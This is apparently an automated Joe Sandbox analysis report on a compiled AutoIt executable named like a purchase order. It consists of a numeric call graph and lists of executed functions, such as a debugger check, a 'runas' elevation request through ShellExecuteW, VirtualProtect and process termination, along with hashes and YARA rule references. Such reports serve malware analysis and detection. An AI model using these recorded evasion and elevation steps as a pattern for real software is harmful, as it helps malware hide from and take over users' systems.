VariantClear moneypunct 85994->86153 85995->86001 85996->85994 85998 42d425 moneypunct 85996->85998 85997 42d45a VariantClear 85997->86003 85998->85997 85998->86003 86001->85996 86002 4115d7 52 API calls 86001->86002 86002->85996 86003->85986 86154 45e737 90 API calls 3 library calls 86003->86154 86005 408fff 86004->86005 86016 40900d 86004->86016 86155 403ea0 52 API calls __cinit 86005->86155 86008 42c3f6 86158 45e737 90 API calls 3 library calls 86008->86158 86010 42c44a 86160 45e737 90 API calls 3 library calls 86010->86160 86011 40a780 201 API calls 86011->86016 86012 42c47b 86161 451b42 61 API calls 86012->86161 86016->86008 86016->86010 86016->86011 86016->86012 86017 42c4cb 86016->86017 86018 42c564 86016->86018 86022 42c548 86016->86022 86023 409112 86016->86023 86026 4090df 86016->86026 86028 42c528 86016->86028 86030 4090ea 86016->86030 86038 4090f2 moneypunct 86016->86038 86157 4534e3 52 API calls 86016->86157 86159 40c4e0 201 API calls 86016->86159 86163 47faae 240 API calls 86017->86163 86019 408f40 VariantClear 86018->86019 86019->86038 86020 42c491 86020->86038 86162 45e737 90 API calls 3 library calls 86020->86162 86166 45e737 90 API calls 3 library calls 86022->86166 86023->86022 86033 40912b 86023->86033 86024 42c4da 86024->86038 86164 45e737 90 API calls 3 library calls 86024->86164 86026->86030 86031 408e80 VariantClear 86026->86031 86165 45e737 90 API calls 3 library calls 86028->86165 86034 408f40 VariantClear 86030->86034 86031->86030 86033->86038 86156 403e10 53 API calls 86033->86156 86034->86038 86036 40914b 86037 408f40 VariantClear 86036->86037 86037->86038 86038->84978 86167 408d90 86039->86167 86041 429778 86196 410c60 VariantClear moneypunct 86041->86196 86043 429780 86044 408cf9 86044->86041 86045 42976c 86044->86045 86047 408d2d 86044->86047 86195 45e737 90 API calls 3 library calls 86045->86195 86183 403d10 86047->86183 86050 408d71 moneypunct 86050->84978 86051 408d45 moneypunct 86051->86050 86052 408f40 VariantClear 86051->86052 86052->86051 86053->84978 86054->84978 86055->84978 86056->84978 86057->84926 86058->84931 86059->84978 86060->84978 86061->84978 86062->84978 86063->84975 86064->84975 86065->84975 86066->84975 86067->84975 86068->84975 86069->84975 86071 403cdf 86070->86071 86072 408f40 VariantClear 86071->86072 86073 403ce7 86072->86073 86073->84970 86074->84975 86075->84975 86076->84978 86077->84923 86079 408e88 86078->86079 86081 408e94 86078->86081 86080 408f40 VariantClear 86079->86080 86080->86081 86082 45340c 86081->86082 86083 453439 86082->86083 86085 453419 86082->86085 86083->85937 86084 45342f 86084->85937 86085->86084 86140 4531b1 85 API calls 5 library calls 86085->86140 86087 453425 86087->85937 86088->85943 86089->85945 86090->85928 86091->85936 86092->85956 86093->85954 86094->85974 86095->85964 86096->85936 86098 40a7a6 86097->86098 86099 40ae8c 86097->86099 86101 4115d7 52 API calls 86098->86101 86141 41130a 51 API calls __cinit 86099->86141 86118 40a7c6 moneypunct _memmove 86101->86118 86102 40a86d 86103 40abd1 86102->86103 86122 40a878 moneypunct 86102->86122 86146 45e737 90 API calls 3 library calls 86103->86146 86104 401b10 52 API calls 86104->86118 86106 42b791 VariantClear 86106->86118 86107 408e80 VariantClear 86107->86118 86108 4115d7 52 API calls 86108->86118 86109 42ba2d VariantClear 86109->86118 86110 408f40 VariantClear 86110->86122 86111 40e270 VariantClear 86111->86118 86112 42b459 VariantClear 86112->86118 86113 40a884 moneypunct 86113->85974 86114 40bc10 53 API calls 86114->86118 86115 408cc0 194 API calls 86115->86118 86116 42b6f6 VariantClear 86116->86118 86118->86102 86118->86103 86118->86104 86118->86106 86118->86107 86118->86108 86118->86109 86118->86111 86118->86112 86118->86114 86118->86115 86118->86116 86120 42bbf5 86118->86120 86121 42bb6a 86118->86121 86123 4115d7 52 API calls 86118->86123 86124 40b5f0 89 API calls 86118->86124 86128 408f40 VariantClear 86118->86128 86132 42bc37 86118->86132 86137 4530c9 VariantClear 86118->86137 86142 45308a 53 API calls 86118->86142 86143 470870 52 API calls 86118->86143 86144 457f66 87 API calls __write_nolock 86118->86144 86145 472f47 127 API calls 86118->86145 86119 42bc5b 86119->85974 86147 45e737 90 API calls 3 library calls 86120->86147 86149 44b92d VariantClear 86121->86149 86122->86110 86122->86113 86126 42b5b3 VariantInit VariantCopy 86123->86126 86124->86118 86126->86118 86129 42b5d7 VariantClear 86126->86129 86128->86118 86129->86118 86148 45e737 90 API calls 3 library calls 86132->86148 86135 42bc48 86135->86121 86136 408f40 VariantClear 86135->86136 86136->86121 86137->86118 86138->85962 86139->85966 86140->86087 86141->86118 86142->86118 86143->86118 86144->86118 86145->86118 86146->86121 86147->86121 86148->86135 86149->86119 86150->85982 86151->85987 86152->86001 86153->86003 86154->85990 86155->86016 86156->86036 86157->86016 86158->86038 86159->86016 86160->86038 86161->86020 86162->86038 86163->86024 86164->86038 86165->86038 86166->86018 86168 4289d2 86167->86168 86169 408db3 86167->86169 86199 45e737 90 API calls 3 library calls 86168->86199 86197 40bec0 90 API calls 86169->86197 86172 4289e5 86200 45e737 90 API calls 3 library calls 86172->86200 86174 428a05 86176 408f40 VariantClear 86174->86176 86182 408e5a 86176->86182 86177 40a780 201 API calls 86180 408dc9 86177->86180 86178 408e64 86179 408f40 VariantClear 86178->86179 86179->86182 86180->86172 86180->86174 86180->86177 86180->86178 86181 408f40 VariantClear 86180->86181 86180->86182 86198 40ba10 52 API calls 2 library calls 86180->86198 86181->86180 86182->86044 86184 408f40 VariantClear 86183->86184 86185 403d20 86184->86185 86186 403cd0 VariantClear 86185->86186 86187 403d4d 86186->86187 86201 4813fa 86187->86201 86211 40de10 86187->86211 86216 4755ad 86187->86216 86219 45e17d 86187->86219 86229 46e91c 86187->86229 86232 467897 86187->86232 86188 403d76 86188->86041 86188->86051 86195->86041 86196->86043 86197->86180 86198->86180 86199->86172 86200->86174 86202 45340c 85 API calls 86201->86202 86203 481438 86202->86203 86204 402880 95 API calls 86203->86204 86205 48143f 86204->86205 86206 481465 86205->86206 86207 40a780 201 API calls 86205->86207 86209 481469 86206->86209 86276 40e710 53 API calls 86206->86276 86207->86206 86209->86188 86210 4814a4 86210->86188 86212 4115d7 52 API calls 86211->86212 86213 40de23 86212->86213 86277 40da20 86213->86277 86215 40de2e 86215->86188 86281 475077 86216->86281 86218 4755c0 86218->86188 86220 45e198 86219->86220 86221 45e19c 86220->86221 86222 45e1b8 86220->86222 86223 408f40 VariantClear 86221->86223 86224 45e1cc 86222->86224 86225 45e1db FindClose 86222->86225 86226 45e1a4 86223->86226 86228 45e1d9 moneypunct 86224->86228 86387 44ae3e 86224->86387 86225->86228 86226->86188 86228->86188 86396 46e785 86229->86396 86231 46e92f 86231->86188 86233 4678bb 86232->86233 86236 45340c 85 API calls 86233->86236 86265 467954 86233->86265 86234 4115d7 52 API calls 86235 467989 86234->86235 86237 467995 86235->86237 86484 40da60 53 API calls 86235->86484 86238 4678f6 86236->86238 86241 4533eb 85 API calls 86237->86241 86240 413a0e __wsplitpath 46 API calls 86238->86240 86242 4678fc 86240->86242 86243 4679b7 86241->86243 86244 401b10 52 API calls 86242->86244 86245 40de40 60 API calls 86243->86245 86246 46790c 86244->86246 86247 4679c3 86245->86247 86481 40d200 52 API calls 2 library calls 86246->86481 86250 4679c7 GetLastError 86247->86250 86251 467a05 86247->86251 86249 467917 86249->86265 86482 4339fa GetFileAttributesW FindFirstFileW FindClose 86249->86482 86252 403cd0 VariantClear 86250->86252 86255 467a2c 86251->86255 86256 467a4b 86251->86256 86253 4679dc 86252->86253 86257 4679e6 86253->86257 86261 44ae3e CloseHandle 86253->86261 86260 4115d7 52 API calls 86255->86260 86258 4115d7 52 API calls 86256->86258 86264 408f40 VariantClear 86257->86264 86262 467a49 86258->86262 86259 467928 86263 46792f 86259->86263 86259->86265 86267 467a31 86260->86267 86261->86257 86271 408f40 VariantClear 86262->86271 86483 4335cd 56 API calls 3 library calls 86263->86483 86269 4679ed 86264->86269 86265->86234 86266 467964 86265->86266 86266->86188 86485 436299 52 API calls 2 library calls 86267->86485 86269->86188 86273 467a88 86271->86273 86272 467939 86272->86265 86274 408f40 VariantClear 86272->86274 86273->86188 86275 467947 86274->86275 86275->86265 86276->86210 86278 40da37 86277->86278 86279 40da29 86277->86279 86278->86279 86280 40da3c CloseHandle 86278->86280 86279->86215 86280->86215 86334 4533eb 86281->86334 86284 4750ee 86286 408f40 VariantClear 86284->86286 86285 475129 86338 4646e0 86285->86338 86294 4750f5 86286->86294 86288 47515e 86289 475162 86288->86289 86314 47518e 86288->86314 86290 408f40 VariantClear 86289->86290 86308 475169 86290->86308 86291 475357 86292 475365 86291->86292 86293 4754ea 86291->86293 86372 44b3ac 57 API calls 86292->86372 86378 464812 92 API calls 86293->86378 86294->86218 86298 4754fc 86299 475374 86298->86299 86300 475508 86298->86300 86351 430d31 86299->86351 86302 408f40 VariantClear 86300->86302 86301 4533eb 85 API calls 86301->86314 86304 47550f 86302->86304 86304->86308 86305 475388 86358 4577e9 86305->86358 86308->86218 86309 47539e 86366 410cfc 86309->86366 86310 475480 86311 408f40 VariantClear 86310->86311 86311->86308 86314->86291 86314->86301 86314->86310 86320 4754b5 86314->86320 86370 436299 52 API calls 2 library calls 86314->86370 86371 463ad5 64 API calls __wcsicoll 86314->86371 86315 4753d4 86374 40e830 53 API calls 86315->86374 86316 4753b8 86373 45e737 90 API calls 3 library calls 86316->86373 86319 4753c5 GetCurrentProcess TerminateProcess 86319->86315 86322 408f40 VariantClear 86320->86322 86321 4753e3 86332 475406 86321->86332 86375 40cf00 53 API calls 86321->86375 86322->86308 86324 475556 86324->86308 86328 47556e FreeLibrary 86324->86328 86325 4753f8 86376 46c43e 106 API calls 2 library calls 86325->86376 86328->86308 86330 408e80 VariantClear 86330->86332 86332->86324 86332->86330 86333 408f40 VariantClear 86332->86333 86377 40cf00 53 API calls 86332->86377 86379 44b3ac 57 API calls 86332->86379 86380 46c43e 106 API calls 2 library calls 86332->86380 86333->86332 86335 453404 86334->86335 86336 4533f8 86334->86336 86335->86284 86335->86285 86336->86335 86381 4531b1 85 API calls 5 library calls 86336->86381 86382 4536f7 53 API calls 86338->86382 86340 4646fc 86383 4426cd 59 API calls _wcslen 86340->86383 86342 464711 86344 40bc70 52 API calls 86342->86344 86350 46474b 86342->86350 86345 46472c 86344->86345 86384 461465 52 API calls _memmove 86345->86384 86347 464741 86348 40c600 52 API calls 86347->86348 86348->86350 86349 464793 86349->86288 86350->86349 86385 463ad5 64 API calls __wcsicoll 86350->86385 86352 430db2 86351->86352 86353 430d54 86351->86353 86352->86305 86354 4115d7 52 API calls 86353->86354 86355 430d74 86354->86355 86356 430da9 86355->86356 86357 4115d7 52 API calls 86355->86357 86356->86305 86357->86355 86359 457a84 86358->86359 86361 45780c _strcat moneypunct _wcslen _wcscpy 86358->86361 86359->86309 86360 45340c 85 API calls 86360->86361 86361->86359 86361->86360 86362 443006 57 API calls 86361->86362 86364 4135bb 46 API calls _malloc 86361->86364 86365 40f6f0 54 API calls 86361->86365 86386 44b3ac 57 API calls 86361->86386 86362->86361 86364->86361 86365->86361 86368 410d11 86366->86368 86367 410da9 VirtualProtect 86369 410d77 86367->86369 86368->86367 86368->86369 86369->86315 86369->86316 86370->86314 86371->86314 86372->86299 86373->86319 86374->86321 86375->86325 86376->86332 86377->86332 86378->86298 86379->86332 86380->86332 86381->86335 86382->86340 86383->86342 86384->86347 86385->86349 86386->86361 86389 44ae4b moneypunct 86387->86389 86390 443fdf 86387->86390 86389->86228 86391 40da20 CloseHandle 86390->86391 86392 443feb 86391->86392 86395 4340db CloseHandle moneypunct 86392->86395 86394 444001 86394->86389 86395->86394 86397 46e7a2 86396->86397 86398 4115d7 52 API calls 86397->86398 86401 46e802 86397->86401 86399 46e7ad 86398->86399 86400 46e7b9 86399->86400 86444 40da60 53 API calls 86399->86444 86405 4533eb 85 API calls 86400->86405 86402 46e7e5 86401->86402 86409 46e82f 86401->86409 86404 408f40 VariantClear 86402->86404 86406 46e7ea 86404->86406 86407 46e7ca 86405->86407 86406->86231 86445 40de40 86407->86445 86408 46e8b5 86437 4680ed 86408->86437 86409->86408 86412 46e845 86409->86412 86414 4533eb 85 API calls 86412->86414 86425 46e84b 86414->86425 86415 46e7db 86415->86402 86418 44ae3e CloseHandle 86415->86418 86416 46e8bb 86441 443fbe 86416->86441 86417 46e87a 86457 4689f4 59 API calls 86417->86457 86418->86402 86421 46e883 86458 4013c0 52 API calls 86421->86458 86424 46e88f 86427 40e0a0 52 API calls 86424->86427 86425->86417 86425->86421 86426 408f40 VariantClear 86436 46e881 86426->86436 86428 46e899 86427->86428 86459 40d200 52 API calls 2 library calls 86428->86459 86430 46e911 86430->86231 86431 46e8a5 86460 4689f4 59 API calls 86431->86460 86432 40da20 CloseHandle 86434 46e903 86432->86434 86435 44ae3e CloseHandle 86434->86435 86435->86430 86436->86430 86436->86432 86438 4680fa 86437->86438 86440 468100 86437->86440 86461 467ac4 55 API calls 2 library calls 86438->86461 86440->86416 86462 443e36 86441->86462 86443 443fd3 86443->86426 86443->86436 86444->86400 86446 40da20 CloseHandle 86445->86446 86447 40de4e 86446->86447 86469 40f110 86447->86469 86450 4264fa 86452 40de84 86478 40e080 SetFilePointerEx SetFilePointerEx 86452->86478 86454 40de8b 86479 40f160 SetFilePointerEx SetFilePointerEx WriteFile 86454->86479 86456 40de90 86456->86409 86456->86415 86457->86436 86458->86424 86459->86431 86460->86436 86461->86440 86465 443e19 86462->86465 86466 443e26 86465->86466 86467 443e32 WriteFile 86465->86467 86468 443db4 SetFilePointerEx SetFilePointerEx 86466->86468 86467->86443 86468->86467 86470 40f125 CreateFileW 86469->86470 86471 42630c 86469->86471 86472 40de74 86470->86472 86471->86472 86473 426311 CreateFileW 86471->86473 86472->86450 86477 40dea0 55 API calls moneypunct 86472->86477 86473->86472 86474 426337 86473->86474 86480 40df90 SetFilePointerEx SetFilePointerEx 86474->86480 86476 426342 86476->86472 86477->86452 86478->86454 86479->86456 86480->86476 86481->86249 86482->86259 86483->86272 86484->86237 86485->86262 86486 42d154 86490 480a8d 86486->86490 86488 42d161 86489 480a8d 201 API calls 86488->86489 86489->86488 86491 480ae4 86490->86491 86492 480b26 86490->86492 86493 480aeb 86491->86493 86494 480b15 86491->86494 86495 40bc70 52 API calls 86492->86495 86496 480aee 86493->86496 86497 480b04 86493->86497 86523 4805bf 201 API calls 86494->86523 86513 480b2e 86495->86513 86496->86492 86499 480af3 86496->86499 86522 47fea2 201 API calls __itow_s 86497->86522 86521 47f135 201 API calls 86499->86521 86502 40e0a0 52 API calls 86502->86513 86504 408f40 VariantClear 86506 481156 86504->86506 86505 480aff 86505->86504 86507 408f40 VariantClear 86506->86507 86508 48115e 86507->86508 86508->86488 86509 40e710 53 API calls 86509->86513 86510 401980 53 API calls 86510->86513 86512 40c2c0 52 API calls 86512->86513 86513->86502 86513->86505 86513->86509 86513->86510 86513->86512 86514 408e80 VariantClear 86513->86514 86515 40a780 201 API calls 86513->86515 86517 480ff5 86513->86517 86524 45377f 52 API calls 86513->86524 86525 45e951 53 API calls 86513->86525 86526 40e830 53 API calls 86513->86526 86527 47925f 53 API calls 86513->86527 86528 47fcff 201 API calls 86513->86528 86514->86513 86515->86513 86529 45e737 90 API calls 3 library calls 86517->86529 86521->86505 86522->86505 86523->86505 86524->86513 86525->86513 86526->86513 86527->86513 86528->86513 86529->86505 86530 425b2b 86535 40f000 86530->86535 86534 425b3a 86536 4115d7 52 API calls 86535->86536 86537 40f007 86536->86537 86538 4276ea 86537->86538 86544 40f030 86537->86544 86543 41130a 51 API calls __cinit 86543->86534 86545 40f039 86544->86545 86546 40f01a 86544->86546 86574 41130a 51 API calls __cinit 86545->86574 86548 40e500 86546->86548 86549 40bc70 52 API calls 86548->86549 86550 40e515 GetVersionExW 86549->86550 86551 402160 52 API calls 86550->86551 86552 40e557 86551->86552 86575 40e660 86552->86575 86558 427674 86562 4276c6 GetSystemInfo 86558->86562 86560 40e5e0 86564 4276d5 GetSystemInfo 86560->86564 86589 40efd0 86560->86589 86561 40e5cd GetCurrentProcess 86596 40ef20 LoadLibraryA GetProcAddress 86561->86596 86562->86564 86567 40e629 86593 40ef90 86567->86593 86570 40e641 FreeLibrary 86571 40e644 86570->86571 86572 40e653 FreeLibrary 86571->86572 86573 40e656 86571->86573 86572->86573 86573->86543 86574->86546 86576 40e667 86575->86576 86577 42761d 86576->86577 86578 40c600 52 API calls 86576->86578 86579 40e55c 86578->86579 86580 40e680 86579->86580 86581 40e687 86580->86581 86582 427616 86581->86582 86583 40c600 52 API calls 86581->86583 86584 40e566 86583->86584 86584->86558 86585 40ef60 86584->86585 86586 40e5c8 86585->86586 86587 40ef66 LoadLibraryA 86585->86587 86586->86560 86586->86561 86587->86586 86588 40ef77 GetProcAddress 86587->86588 86588->86586 86590 40e620 86589->86590 86591 40efd6 LoadLibraryA 86589->86591 86590->86562 86590->86567 86591->86590 86592 40efe7 GetProcAddress 86591->86592 86592->86590 86597 40efb0 LoadLibraryA GetProcAddress 86593->86597 86595 40e632 GetNativeSystemInfo 86595->86570 86595->86571 86596->86560 86597->86595 86598 425b5e 86603 40c7f0 86598->86603 86602 425b6d 86638 40db10 52 API calls 86603->86638 86605 40c82a 86639 410ab0 6 API calls 86605->86639 86607 40c86d 86608 40bc70 52 API calls 86607->86608 86609 40c877 86608->86609 86610 40bc70 52 API calls 86609->86610 86611 40c881 86610->86611 86612 40bc70 52 API calls 86611->86612 86613 40c88b 86612->86613 86614 40bc70 52 API calls 86613->86614 86615 40c8d1 86614->86615 86616 40bc70 52 API calls 86615->86616 86617 40c991 86616->86617 86640 40d2c0 52 API calls 86617->86640 86619 40c99b 86641 40d0d0 53 API calls 86619->86641 86621 40c9c1 86622 40bc70 52 API calls 86621->86622 86623 40c9cb 86622->86623 86642 40e310 53 API calls 86623->86642 86625 40ca28 86626 408f40 VariantClear 86625->86626 86627 40ca30 86626->86627 86628 408f40 VariantClear 86627->86628 86629 40ca38 GetStdHandle 86628->86629 86630 429630 86629->86630 86631 40ca87 86629->86631 86630->86631 86632 429639 86630->86632 86637 41130a 51 API calls __cinit 86631->86637 86643 4432c0 57 API calls 86632->86643 86634 429641 86644 44b6ab CreateThread 86634->86644 86636 42964f CloseHandle 86636->86631 86637->86602 86638->86605 86639->86607 86640->86619 86641->86621 86642->86625 86643->86634 86644->86636 86645 44b5cb 58 API calls 86644->86645 86646 425b6f 86651 40dc90 86646->86651 86650 425b7e 86652 40bc70 52 API calls 86651->86652 86653 40dd03 86652->86653 86660 40f210 86653->86660 86655 426a97 86657 40dd96 86657->86655 86658 40ddb7 86657->86658 86663 40dc00 52 API calls 2 library calls 86657->86663 86659 41130a 51 API calls __cinit 86658->86659 86659->86650 86664 40f250 RegOpenKeyExW 86660->86664 86662 40f230 86662->86657 86663->86657 86665 425e17 86664->86665 86666 40f275 RegQueryValueExW 86664->86666 86665->86662 86667 40f2c3 RegCloseKey 86666->86667 86668 40f298 86666->86668 86667->86662 86669 40f2a9 RegCloseKey 86668->86669 86670 425e1d 86668->86670 86669->86662

                      Executed Functions

                      Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                        • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                        • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                      • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                      • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                        • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                      • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                      • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                        • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                        • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                        • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                        • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                        • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                        • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                      Strings
                      • runas, xrefs: 0042E2AD, 0042E2DC
                      • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                      • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                      • API String ID: 2495805114-3383388033
                      • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                      • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                      • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                      • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                      Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1004 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1013 40e582-40e583 1004->1013 1014 427674-427679 1004->1014 1017 40e585-40e596 1013->1017 1018 40e5ba-40e5cb call 40ef60 1013->1018 1015 427683-427686 1014->1015 1016 42767b-427681 1014->1016 1019 427693-427696 1015->1019 1020 427688-427691 1015->1020 1024 4276b4-4276be 1016->1024 1021 427625-427629 1017->1021 1022 40e59c-40e59f 1017->1022 1035 40e5ec-40e60c 1018->1035 1036 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1018->1036 1019->1024 1027 427698-4276a8 1019->1027 1020->1024 1029 427636-427640 1021->1029 1030 42762b-427631 1021->1030 1025 40e5a5-40e5ae 1022->1025 1026 427654-427657 1022->1026 1037 4276c6-4276ca GetSystemInfo 1024->1037 1031 40e5b4 1025->1031 1032 427645-42764f 1025->1032 1026->1018 1038 42765d-42766f 1026->1038 1033 4276b0 1027->1033 1034 4276aa-4276ae 1027->1034 1029->1018 1030->1018 1031->1018 1032->1018 1033->1024 1034->1024 1040 40e612-40e623 call 40efd0 1035->1040 1041 4276d5-4276df GetSystemInfo 1035->1041 1036->1035 1048 40e5e8 1036->1048 1037->1041 1038->1018 1040->1037 1045 40e629-40e63f call 40ef90 GetNativeSystemInfo 1040->1045 1050 40e641-40e642 FreeLibrary 1045->1050 1051 40e644-40e651 1045->1051 1048->1035 1050->1051 1052 40e653-40e654 FreeLibrary 1051->1052 1053 40e656-40e65d 1051->1053 1052->1053
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 0040E52A
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                      • FreeLibrary.KERNEL32(?), ref: 0040E642
                      • FreeLibrary.KERNEL32(?), ref: 0040E654
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                      • String ID: 0SH
                      • API String ID: 3363477735-851180471
                      • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                      • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                      • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                      • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                      Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: IsThemeActive$uxtheme.dll
                      • API String ID: 2574300362-3542929980
                      • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                      • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                      • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                      • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                      Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                      Download Yara Rule
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
